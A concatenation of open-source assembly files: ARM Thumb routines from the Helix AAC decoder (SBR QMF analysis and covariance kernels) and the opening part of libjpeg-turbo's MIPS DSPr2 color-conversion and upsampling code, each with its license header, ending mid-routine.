addlt r6, r6, #1280
add r5, r5, #1
sub r6, r6, #1
add r8, r8, #0x04
mov r8, r8, asr #3 @ FBITS_OUT_QMFS
mov r7, r8, asr #31
cmp r7, r8, asr #15
eorne r8, r7, #0x7f00 @ takes 2 instructions for immediate value of 0x7fffffff
eorne r8, r8, #0x00ff
strh r8, [r3, #0]
add r3, r3, r9, lsl #1
subs r4, r4, #1
bne SRC_Loop_Start
ldmfd sp!, {r4-r11, pc}
.end
|
open-vela/external_libhelix-aac | 5,719 | sbrqmfak.s | @ ***** BEGIN LICENSE BLOCK *****
@ Source last modified: $Id: sbrqmfak.s,v 1.1 2005/04/08 21:59:46 jrecker Exp $
@
@ Portions Copyright (c) 1995-2005 RealNetworks, Inc. All Rights Reserved.
@
@ The contents of this file, and the files included with this file,
@ are subject to the current version of the RealNetworks Public
@ Source License (the "RPSL") available at
@ http://www.helixcommunity.org/content/rpsl unless you have licensed
@ the file under the current version of the RealNetworks Community
@ Source License (the "RCSL") available at
@ http://www.helixcommunity.org/content/rcsl, in which case the RCSL
@ will apply. You may also obtain the license terms directly from
@ RealNetworks. You may not use this file except in compliance with
@ the RPSL or, if you have a valid RCSL with RealNetworks applicable
@ to this file, the RCSL. Please see the applicable RPSL or RCSL for
@ the rights, obligations and limitations governing use of the
@ contents of the file.
@
@ This file is part of the Helix DNA Technology. RealNetworks is the
@ developer and/or licensor of the Original Code and owns the
@ copyrights in the portions it created.
@
@ This file, and the files included with this file, is distributed
@ and made available on an 'AS IS' basis, WITHOUT WARRANTY OF ANY
@ KIND, EITHER EXPRESS OR IMPLIED, AND REALNETWORKS HEREBY DISCLAIMS
@ ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION, ANY WARRANTIES
@ OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET
@ ENJOYMENT OR NON-INFRINGEMENT.
@
@ Technology Compatibility Kit Test Suite(s) Location:
@ http://www.helixcommunity.org/content/tck
@
@ Contributor(s):
@
@ ***** END LICENSE BLOCK *****
.syntax unified
.thumb
.thumb_func
.align 2
@void QMFAnalysisConv(int *cTab, int *delay, int dIdx, int *uBuf)
@ see comments in sbrqmf.c
.global raac_QMFAnalysisConv
raac_QMFAnalysisConv:
stmfd sp!, {r4-r11, r14}
mov r6, r2, lsl #5 @ dOff0 = 32*dIdx
add r6, r6, #31 @ dOff0 = 32*dIdx + 31
add r4, r0, #4*(164) @ cPtr1 = cPtr0 + 164
@ special first pass (flip sign for cTab[384], cTab[512])
ldr r11, [r0], #4
ldr r14, [r0], #4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smull r7, r8, r11, r12
smull r9, r10, r14, r2
ldr r11, [r0], #4
ldr r14, [r0], #4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r0], #4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r4], #-4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
rsb r11, r11, #0
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r4], #-4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
rsb r11, r11, #0
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
str r10, [r3, #4*32]
str r8, [r3], #4
sub r6, r6, #1
mov r5, #31
SRC_Loop_Start:
ldr r11, [r0], #4
ldr r14, [r0], #4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smull r7, r8, r11, r12
smull r9, r10, r14, r2
ldr r11, [r0], #4
ldr r14, [r0], #4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r0], #4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r4], #-4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
ldr r11, [r4], #-4
ldr r14, [r4], #-4
ldr r12, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
ldr r2, [r1, r6, lsl #2]
subs r6, r6, #32
addlt r6, r6, #320
smlal r7, r8, r11, r12
smlal r9, r10, r14, r2
str r10, [r3, #4*32]
str r8, [r3], #4
sub r6, r6, #1
subs r5, r5, #1
bne SRC_Loop_Start
ldmfd sp!, {r4-r11, pc}
.end
|
open-vela/external_libhelix-aac | 4,760 | sbrcov.s | @ ***** BEGIN LICENSE BLOCK *****
@ Source last modified: $Id: sbrcov.s,v 1.1 2005/04/08 21:59:46 jrecker Exp $
@
@ Portions Copyright (c) 1995-2005 RealNetworks, Inc. All Rights Reserved.
@
@ The contents of this file, and the files included with this file,
@ are subject to the current version of the RealNetworks Public
@ Source License (the "RPSL") available at
@ http://www.helixcommunity.org/content/rpsl unless you have licensed
@ the file under the current version of the RealNetworks Community
@ Source License (the "RCSL") available at
@ http://www.helixcommunity.org/content/rcsl, in which case the RCSL
@ will apply. You may also obtain the license terms directly from
@ RealNetworks. You may not use this file except in compliance with
@ the RPSL or, if you have a valid RCSL with RealNetworks applicable
@ to this file, the RCSL. Please see the applicable RPSL or RCSL for
@ the rights, obligations and limitations governing use of the
@ contents of the file.
@
@ This file is part of the Helix DNA Technology. RealNetworks is the
@ developer and/or licensor of the Original Code and owns the
@ copyrights in the portions it created.
@
@ This file, and the files included with this file, is distributed
@ and made available on an 'AS IS' basis, WITHOUT WARRANTY OF ANY
@ KIND, EITHER EXPRESS OR IMPLIED, AND REALNETWORKS HEREBY DISCLAIMS
@ ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION, ANY WARRANTIES
@ OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, QUIET
@ ENJOYMENT OR NON-INFRINGEMENT.
@
@ Technology Compatibility Kit Test Suite(s) Location:
@ http://www.helixcommunity.org/content/tck
@
@ Contributor(s):
@
@ ***** END LICENSE BLOCK *****
.syntax unified
.thumb
.thumb_func
.align 2
@ void CVKernel1(int *XBuf, int *accBuf)
@ see comments in sbrhfgen.c
.global raac_CVKernel1
raac_CVKernel1:
stmfd sp!, {r4-r11, r14}
ldr r3, [r0], #4*(1)
mov r14, #4*(2*64-1)
add r14, r0, r14
ldr r4, [r14]
ldr r5, [r0], #4*(1)
ldr r6, [r14]
rsb r14, r4, #0
smull r7, r8, r5, r3
smlal r7, r8, r6, r4
smull r9, r10, r3, r6
smlal r9, r10, r14, r5
smull r11, r12, r3, r3
smlal r11, r12, r4, r4
add r2, r1, #(4*6)
stmia r2, {r7-r12}
mov r7, #0
mov r8, #0
mov r9, #0
mov r10, #0
mov r11, #0
mov r12, #0
mov r2, #(16*2 + 6)
CV1_Loop_Start:
mov r3, r5
ldr r5, [r0], #4*(1)
mov r4, r6
mov r14, #4*(2*64-1)
add r14, r0, r14
ldr r6, [r14]
rsb r14, r4, #0
smlal r7, r8, r5, r3
smlal r7, r8, r6, r4
smlal r9, r10, r3, r6
smlal r9, r10, r14, r5
smlal r11, r12, r3, r3
smlal r11, r12, r4, r4
subs r2, r2, #1
bne CV1_Loop_Start
stmia r1, {r7-r12}
ldr r0, [r1, #4*(6)]
ldr r2, [r1, #4*(7)]
rsb r3, r3, #0
adds r7, r0, r7
adc r8, r2, r8
smlal r7, r8, r5, r3
smlal r7, r8, r6, r14
ldr r0, [r1, #4*(8)]
ldr r2, [r1, #4*(9)]
adds r9, r0, r9
adc r10, r2, r10
smlal r9, r10, r3, r6
smlal r9, r10, r4, r5
ldr r0, [r1, #4*(10)]
ldr r2, [r1, #4*(11)]
adds r11, r0, r11
adc r12, r2, r12
rsb r0, r3, #0
smlal r11, r12, r3, r0
rsb r2, r4, #0
smlal r11, r12, r4, r2
add r1, r1, #(4*6)
stmia r1, {r7-r12}
ldmfd sp!, {r4-r11, pc}
@ void CVKernel2(int *XBuf, int *accBuf)
@ see comments in sbrhfgen.c
.global raac_CVKernel2
raac_CVKernel2:
stmfd sp!, {r4-r11, r14}
mov r7, #0
mov r8, #0
mov r9, #0
mov r10, #0
ldr r3, [r0], #4*(1)
mov r14, #4*(2*64-1)
add r14, r0, r14
ldr r4, [r14]
ldr r5, [r0], #4*(1)
ldr r6, [r14]
mov r2, #(16*2 + 6)
CV2_Loop_Start:
ldr r11, [r0], #4*(1)
mov r14, #4*(2*64-1)
add r14, r0, r14
ldr r12, [r14]
rsb r14, r4, #0
smlal r7, r8, r11, r3
smlal r7, r8, r12, r4
smlal r9, r10, r3, r12
smlal r9, r10, r14, r11
mov r3, r5
mov r4, r6
mov r5, r11
mov r6, r12
subs r2, r2, #1
bne CV2_Loop_Start
stmia r1, {r7-r10}
ldmfd sp!, {r4-r11, pc}
.end
|
open-vela/external_libjpeg-turbo | 148,685 | simd/mips/jsimd_dspr2.S | /*
* MIPS DSPr2 optimizations for libjpeg-turbo
*
* Copyright (C) 2013-2014, MIPS Technologies, Inc., California.
* All Rights Reserved.
* Authors: Teodora Novkovic <teodora.novkovic@imgtec.com>
* Darko Laus <darko.laus@imgtec.com>
* Copyright (C) 2015, D. R. Commander. All Rights Reserved.
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#include "jsimd_dspr2_asm.h"
/*****************************************************************************/
LEAF_DSPR2(jsimd_c_null_convert_dspr2)
/*
* a0 = cinfo->image_width
* a1 = input_buf
* a2 = output_buf
* a3 = output_row
* 16(sp) = num_rows
* 20(sp) = cinfo->num_components
*
* Null conversion for compression
*/
SAVE_REGS_ON_STACK 8, s0, s1
lw t9, 24(sp) /* t9 = num_rows */
lw s0, 28(sp) /* s0 = cinfo->num_components */
andi t0, a0, 3 /* t0 = cinfo->image_width & 3 */
beqz t0, 4f /* no residual */
nop
0:
addiu t9, t9, -1
bltz t9, 7f
li t1, 0
1:
sll t3, t1, 2
lwx t5, t3(a2) /* t5 = outptr = output_buf[ci] */
lw t2, 0(a1) /* t2 = inptr = *input_buf */
sll t4, a3, 2
lwx t5, t4(t5) /* t5 = outptr = output_buf[ci][output_row] */
addu t2, t2, t1
addu s1, t5, a0
addu t6, t5, t0
2:
lbu t3, 0(t2)
addiu t5, t5, 1
sb t3, -1(t5)
bne t6, t5, 2b
addu t2, t2, s0
3:
lbu t3, 0(t2)
addu t4, t2, s0
addu t7, t4, s0
addu t8, t7, s0
addu t2, t8, s0
lbu t4, 0(t4)
lbu t7, 0(t7)
lbu t8, 0(t8)
addiu t5, t5, 4
sb t3, -4(t5)
sb t4, -3(t5)
sb t7, -2(t5)
bne s1, t5, 3b
sb t8, -1(t5)
addiu t1, t1, 1
bne t1, s0, 1b
nop
addiu a1, a1, 4
bgez t9, 0b
addiu a3, a3, 1
b 7f
nop
4:
addiu t9, t9, -1
bltz t9, 7f
li t1, 0
5:
sll t3, t1, 2
lwx t5, t3(a2) /* t5 = outptr = output_buf[ci] */
lw t2, 0(a1) /* t2 = inptr = *input_buf */
sll t4, a3, 2
lwx t5, t4(t5) /* t5 = outptr = output_buf[ci][output_row] */
addu t2, t2, t1
addu s1, t5, a0
addu t6, t5, t0
6:
lbu t3, 0(t2)
addu t4, t2, s0
addu t7, t4, s0
addu t8, t7, s0
addu t2, t8, s0
lbu t4, 0(t4)
lbu t7, 0(t7)
lbu t8, 0(t8)
addiu t5, t5, 4
sb t3, -4(t5)
sb t4, -3(t5)
sb t7, -2(t5)
bne s1, t5, 6b
sb t8, -1(t5)
addiu t1, t1, 1
bne t1, s0, 5b
nop
addiu a1, a1, 4
bgez t9, 4b
addiu a3, a3, 1
7:
RESTORE_REGS_FROM_STACK 8, s0, s1
j ra
nop
END(jsimd_c_null_convert_dspr2)
/*****************************************************************************/
/*
* jsimd_extrgb_ycc_convert_dspr2
* jsimd_extbgr_ycc_convert_dspr2
* jsimd_extrgbx_ycc_convert_dspr2
* jsimd_extbgrx_ycc_convert_dspr2
* jsimd_extxbgr_ycc_convert_dspr2
* jsimd_extxrgb_ycc_convert_dspr2
*
* Colorspace conversion RGB -> YCbCr
*/
.macro GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 colorid, pixel_size, \
r_offs, g_offs, b_offs
.macro DO_RGB_TO_YCC r, g, b, inptr
lbu \r, \r_offs(\inptr)
lbu \g, \g_offs(\inptr)
lbu \b, \b_offs(\inptr)
addiu \inptr, \pixel_size
.endm
LEAF_DSPR2(jsimd_\colorid\()_ycc_convert_dspr2)
/*
* a0 = cinfo->image_width
* a1 = input_buf
* a2 = output_buf
* a3 = output_row
* 16(sp) = num_rows
*/
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
lw t7, 48(sp) /* t7 = num_rows */
li s0, 0x4c8b /* FIX(0.29900) */
li s1, 0x9646 /* FIX(0.58700) */
li s2, 0x1d2f /* FIX(0.11400) */
li s3, 0xffffd4cd /* -FIX(0.16874) */
li s4, 0xffffab33 /* -FIX(0.33126) */
li s5, 0x8000 /* FIX(0.50000) */
li s6, 0xffff94d1 /* -FIX(0.41869) */
li s7, 0xffffeb2f /* -FIX(0.08131) */
li t8, 0x807fff /* CBCR_OFFSET + ONE_HALF-1 */
0:
addiu t7, -1 /* --num_rows */
lw t6, 0(a1) /* t6 = input_buf[0] */
lw t0, 0(a2)
lw t1, 4(a2)
lw t2, 8(a2)
sll t3, a3, 2
lwx t0, t3(t0) /* t0 = output_buf[0][output_row] */
lwx t1, t3(t1) /* t1 = output_buf[1][output_row] */
lwx t2, t3(t2) /* t2 = output_buf[2][output_row] */
addu t9, t2, a0 /* t9 = end address */
addiu a3, 1
1:
DO_RGB_TO_YCC t3, t4, t5, t6
mtlo s5, $ac0
mtlo t8, $ac1
mtlo t8, $ac2
maddu $ac0, s2, t5
maddu $ac1, s5, t5
maddu $ac2, s5, t3
maddu $ac0, s0, t3
maddu $ac1, s3, t3
maddu $ac2, s6, t4
maddu $ac0, s1, t4
maddu $ac1, s4, t4
maddu $ac2, s7, t5
extr.w t3, $ac0, 16
extr.w t4, $ac1, 16
extr.w t5, $ac2, 16
sb t3, 0(t0)
sb t4, 0(t1)
sb t5, 0(t2)
addiu t0, 1
addiu t2, 1
bne t2, t9, 1b
addiu t1, 1
bgtz t7, 0b
addiu a1, 4
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_\colorid\()_ycc_convert_dspr2)
.purgem DO_RGB_TO_YCC
.endm
/*-------------------------------------id -- pix R G B */
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extrgb, 3, 0, 1, 2
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extbgr, 3, 2, 1, 0
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extrgbx, 4, 0, 1, 2
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extbgrx, 4, 2, 1, 0
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extxbgr, 4, 3, 2, 1
GENERATE_JSIMD_RGB_YCC_CONVERT_DSPR2 extxrgb, 4, 1, 2, 3
/*****************************************************************************/
/*
* jsimd_ycc_extrgb_convert_dspr2
* jsimd_ycc_extbgr_convert_dspr2
* jsimd_ycc_extrgbx_convert_dspr2
* jsimd_ycc_extbgrx_convert_dspr2
* jsimd_ycc_extxbgr_convert_dspr2
* jsimd_ycc_extxrgb_convert_dspr2
*
* Colorspace conversion YCbCr -> RGB
*/
.macro GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 colorid, pixel_size, \
r_offs, g_offs, b_offs, a_offs
.macro STORE_YCC_TO_RGB scratch0 scratch1 scratch2 outptr
sb \scratch0, \r_offs(\outptr)
sb \scratch1, \g_offs(\outptr)
sb \scratch2, \b_offs(\outptr)
.if (\pixel_size == 4)
li t0, 0xFF
sb t0, \a_offs(\outptr)
.endif
addiu \outptr, \pixel_size
.endm
LEAF_DSPR2(jsimd_ycc_\colorid\()_convert_dspr2)
/*
* a0 = cinfo->image_width
* a1 = input_buf
* a2 = input_row
* a3 = output_buf
* 16(sp) = num_rows
*/
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
lw s1, 48(sp)
li t3, 0x8000
li t4, 0x166e9 /* FIX(1.40200) */
li t5, 0x1c5a2 /* FIX(1.77200) */
li t6, 0xffff492e /* -FIX(0.71414) */
li t7, 0xffffa7e6 /* -FIX(0.34414) */
repl.ph t8, 128
0:
lw s0, 0(a3)
lw t0, 0(a1)
lw t1, 4(a1)
lw t2, 8(a1)
sll s5, a2, 2
addiu s1, -1
lwx s2, s5(t0)
lwx s3, s5(t1)
lwx s4, s5(t2)
addu t9, s2, a0
addiu a2, 1
1:
lbu s7, 0(s4) /* cr */
lbu s6, 0(s3) /* cb */
lbu s5, 0(s2) /* y */
addiu s2, 1
addiu s4, 1
addiu s7, -128
addiu s6, -128
mul t2, t7, s6
mul t0, t6, s7 /* Crgtab[cr] */
sll s7, 15
mulq_rs.w t1, t4, s7 /* Crrtab[cr] */
sll s6, 15
addu t2, t3 /* Cbgtab[cb] */
addu t2, t0
mulq_rs.w t0, t5, s6 /* Cbbtab[cb] */
sra t2, 16
addu t1, s5
addu t2, s5 /* add y */
ins t2, t1, 16, 16
subu.ph t2, t2, t8
addu t0, s5
shll_s.ph t2, t2, 8
subu t0, 128
shra.ph t2, t2, 8
shll_s.w t0, t0, 24
addu.ph t2, t2, t8 /* clip & store */
sra t0, t0, 24
sra t1, t2, 16
addiu t0, 128
STORE_YCC_TO_RGB t1, t2, t0, s0
bne s2, t9, 1b
addiu s3, 1
bgtz s1, 0b
addiu a3, 4
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_ycc_\colorid\()_convert_dspr2)
.purgem STORE_YCC_TO_RGB
.endm
/*-------------------------------------id -- pix R G B A */
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extrgb, 3, 0, 1, 2, 3
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extbgr, 3, 2, 1, 0, 3
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extrgbx, 4, 0, 1, 2, 3
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extbgrx, 4, 2, 1, 0, 3
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extxbgr, 4, 3, 2, 1, 0
GENERATE_JSIMD_YCC_RGB_CONVERT_DSPR2 extxrgb, 4, 1, 2, 3, 0
/*****************************************************************************/
/*
* jsimd_extrgb_gray_convert_dspr2
* jsimd_extbgr_gray_convert_dspr2
* jsimd_extrgbx_gray_convert_dspr2
* jsimd_extbgrx_gray_convert_dspr2
* jsimd_extxbgr_gray_convert_dspr2
* jsimd_extxrgb_gray_convert_dspr2
*
* Colorspace conversion RGB -> GRAY
*/
.macro GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 colorid, pixel_size, \
r_offs, g_offs, b_offs
.macro DO_RGB_TO_GRAY r, g, b, inptr
lbu \r, \r_offs(\inptr)
lbu \g, \g_offs(\inptr)
lbu \b, \b_offs(\inptr)
addiu \inptr, \pixel_size
.endm
LEAF_DSPR2(jsimd_\colorid\()_gray_convert_dspr2)
/*
* a0 = cinfo->image_width
* a1 = input_buf
* a2 = output_buf
* a3 = output_row
* 16(sp) = num_rows
*/
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
li s0, 0x4c8b /* s0 = FIX(0.29900) */
li s1, 0x9646 /* s1 = FIX(0.58700) */
li s2, 0x1d2f /* s2 = FIX(0.11400) */
li s7, 0x8000 /* s7 = FIX(0.50000) */
lw s6, 48(sp)
andi t7, a0, 3
0:
addiu s6, -1 /* s6 = num_rows */
lw t0, 0(a1)
lw t1, 0(a2)
sll t3, a3, 2
lwx t1, t3(t1)
addiu a3, 1
addu t9, t1, a0
subu t8, t9, t7
beq t1, t8, 2f
nop
1:
DO_RGB_TO_GRAY t3, t4, t5, t0
DO_RGB_TO_GRAY s3, s4, s5, t0
mtlo s7, $ac0
maddu $ac0, s2, t5
maddu $ac0, s1, t4
maddu $ac0, s0, t3
mtlo s7, $ac1
maddu $ac1, s2, s5
maddu $ac1, s1, s4
maddu $ac1, s0, s3
extr.w t6, $ac0, 16
DO_RGB_TO_GRAY t3, t4, t5, t0
DO_RGB_TO_GRAY s3, s4, s5, t0
mtlo s7, $ac0
maddu $ac0, s2, t5
maddu $ac0, s1, t4
extr.w t2, $ac1, 16
maddu $ac0, s0, t3
mtlo s7, $ac1
maddu $ac1, s2, s5
maddu $ac1, s1, s4
maddu $ac1, s0, s3
extr.w t5, $ac0, 16
sb t6, 0(t1)
sb t2, 1(t1)
extr.w t3, $ac1, 16
addiu t1, 4
sb t5, -2(t1)
sb t3, -1(t1)
bne t1, t8, 1b
nop
2:
beqz t7, 4f
nop
3:
DO_RGB_TO_GRAY t3, t4, t5, t0
mtlo s7, $ac0
maddu $ac0, s2, t5
maddu $ac0, s1, t4
maddu $ac0, s0, t3
extr.w t6, $ac0, 16
sb t6, 0(t1)
addiu t1, 1
bne t1, t9, 3b
nop
4:
bgtz s6, 0b
addiu a1, 4
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_\colorid\()_gray_convert_dspr2)
.purgem DO_RGB_TO_GRAY
.endm
/*-------------------------------------id -- pix R G B */
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extrgb, 3, 0, 1, 2
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extbgr, 3, 2, 1, 0
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extrgbx, 4, 0, 1, 2
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extbgrx, 4, 2, 1, 0
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extxbgr, 4, 3, 2, 1
GENERATE_JSIMD_RGB_GRAY_CONVERT_DSPR2 extxrgb, 4, 1, 2, 3
/*****************************************************************************/
/*
* jsimd_h2v2_merged_upsample_dspr2
* jsimd_h2v2_extrgb_merged_upsample_dspr2
* jsimd_h2v2_extrgbx_merged_upsample_dspr2
* jsimd_h2v2_extbgr_merged_upsample_dspr2
* jsimd_h2v2_extbgrx_merged_upsample_dspr2
* jsimd_h2v2_extxbgr_merged_upsample_dspr2
* jsimd_h2v2_extxrgb_merged_upsample_dspr2
*
* Merged h2v2 upsample routines
*/
.macro GENERATE_H2V2_MERGED_UPSAMPLE_DSPR2 colorid, pixel_size, \
r1_offs, g1_offs, \
b1_offs, a1_offs, \
r2_offs, g2_offs, \
b2_offs, a2_offs
.macro STORE_H2V2_2_PIXELS scratch0 scratch1 scratch2 scratch3 scratch4 \
scratch5 outptr
sb \scratch0, \r1_offs(\outptr)
sb \scratch1, \g1_offs(\outptr)
sb \scratch2, \b1_offs(\outptr)
sb \scratch3, \r2_offs(\outptr)
sb \scratch4, \g2_offs(\outptr)
sb \scratch5, \b2_offs(\outptr)
.if (\pixel_size == 8)
li \scratch0, 0xFF
sb \scratch0, \a1_offs(\outptr)
sb \scratch0, \a2_offs(\outptr)
.endif
addiu \outptr, \pixel_size
.endm
.macro STORE_H2V2_1_PIXEL scratch0 scratch1 scratch2 outptr
sb \scratch0, \r1_offs(\outptr)
sb \scratch1, \g1_offs(\outptr)
sb \scratch2, \b1_offs(\outptr)
.if (\pixel_size == 8)
li t0, 0xFF
sb t0, \a1_offs(\outptr)
.endif
.endm
LEAF_DSPR2(jsimd_h2v2_\colorid\()_merged_upsample_dspr2)
/*
* a0 = cinfo->output_width
* a1 = input_buf
* a2 = in_row_group_ctr
* a3 = output_buf
* 16(sp) = cinfo->sample_range_limit
*/
SAVE_REGS_ON_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, ra
lw t9, 56(sp) /* cinfo->sample_range_limit */
lw v0, 0(a1)
lw v1, 4(a1)
lw t0, 8(a1)
sll t1, a2, 3
addiu t2, t1, 4
sll t3, a2, 2
lw t4, 0(a3) /* t4 = output_buf[0] */
lwx t1, t1(v0) /* t1 = input_buf[0][in_row_group_ctr*2] */
lwx t2, t2(v0) /* t2 = input_buf[0][in_row_group_ctr*2 + 1] */
lwx t5, t3(v1) /* t5 = input_buf[1][in_row_group_ctr] */
lwx t6, t3(t0) /* t6 = input_buf[2][in_row_group_ctr] */
lw t7, 4(a3) /* t7 = output_buf[1] */
li s1, 0xe6ea
addiu t8, s1, 0x7fff /* t8 = 0x166e9 [FIX(1.40200)] */
addiu s0, t8, 0x5eb9 /* s0 = 0x1c5a2 [FIX(1.77200)] */
addiu s1, zero, 0xa7e6 /* s4 = 0xffffa7e6 [-FIX(0.34414)] */
xori s2, s1, 0xeec8 /* s3 = 0xffff492e [-FIX(0.71414)] */
srl t3, a0, 1
blez t3, 2f
addu t0, t5, t3 /* t0 = end address */
1:
lbu t3, 0(t5)
lbu s3, 0(t6)
addiu t5, t5, 1
addiu t3, t3, -128 /* (cb - 128) */
addiu s3, s3, -128 /* (cr - 128) */
mult $ac1, s1, t3
madd $ac1, s2, s3
sll s3, s3, 15
sll t3, t3, 15
mulq_rs.w s4, t8, s3 /* s4 = (C1 * cr + ONE_HALF)>> SCALEBITS */
extr_r.w s5, $ac1, 16
mulq_rs.w s6, s0, t3 /* s6 = (C2 * cb + ONE_HALF)>> SCALEBITS */
lbu v0, 0(t1)
addiu t6, t6, 1
addiu t1, t1, 2
addu t3, v0, s4 /* y+cred */
addu s3, v0, s5 /* y+cgreen */
addu v1, v0, s6 /* y+cblue */
addu t3, t9, t3 /* y+cred */
addu s3, t9, s3 /* y+cgreen */
addu v1, t9, v1 /* y+cblue */
lbu AT, 0(t3)
lbu s7, 0(s3)
lbu ra, 0(v1)
lbu v0, -1(t1)
addu t3, v0, s4 /* y+cred */
addu s3, v0, s5 /* y+cgreen */
addu v1, v0, s6 /* y+cblue */
addu t3, t9, t3 /* y+cred */
addu s3, t9, s3 /* y+cgreen */
addu v1, t9, v1 /* y+cblue */
lbu t3, 0(t3)
lbu s3, 0(s3)
lbu v1, 0(v1)
lbu v0, 0(t2)
STORE_H2V2_2_PIXELS AT, s7, ra, t3, s3, v1, t4
addu t3, v0, s4 /* y+cred */
addu s3, v0, s5 /* y+cgreen */
addu v1, v0, s6 /* y+cblue */
addu t3, t9, t3 /* y+cred */
addu s3, t9, s3 /* y+cgreen */
addu v1, t9, v1 /* y+cblue */
lbu AT, 0(t3)
lbu s7, 0(s3)
lbu ra, 0(v1)
lbu v0, 1(t2)
addiu t2, t2, 2
addu t3, v0, s4 /* y+cred */
addu s3, v0, s5 /* y+cgreen */
addu v1, v0, s6 /* y+cblue */
addu t3, t9, t3 /* y+cred */
addu s3, t9, s3 /* y+cgreen */
addu v1, t9, v1 /* y+cblue */
lbu t3, 0(t3)
lbu s3, 0(s3)
lbu v1, 0(v1)
STORE_H2V2_2_PIXELS AT, s7, ra, t3, s3, v1, t7
bne t0, t5, 1b
nop
2:
andi t0, a0, 1
beqz t0, 4f
lbu t3, 0(t5)
lbu s3, 0(t6)
addiu t3, t3, -128 /* (cb - 128) */
addiu s3, s3, -128 /* (cr - 128) */
mult $ac1, s1, t3
madd $ac1, s2, s3
sll s3, s3, 15
sll t3, t3, 15
lbu v0, 0(t1)
extr_r.w s5, $ac1, 16
mulq_rs.w s4, t8, s3 /* s4 = (C1 * cr + ONE_HALF)>> SCALEBITS */
mulq_rs.w s6, s0, t3 /* s6 = (C2 * cb + ONE_HALF)>> SCALEBITS */
addu t3, v0, s4 /* y+cred */
addu s3, v0, s5 /* y+cgreen */
addu v1, v0, s6 /* y+cblue */
addu t3, t9, t3 /* y+cred */
addu s3, t9, s3 /* y+cgreen */
addu v1, t9, v1 /* y+cblue */
lbu t3, 0(t3)
lbu s3, 0(s3)
lbu v1, 0(v1)
lbu v0, 0(t2)
STORE_H2V2_1_PIXEL t3, s3, v1, t4
addu t3, v0, s4 /* y+cred */
addu s3, v0, s5 /* y+cgreen */
addu v1, v0, s6 /* y+cblue */
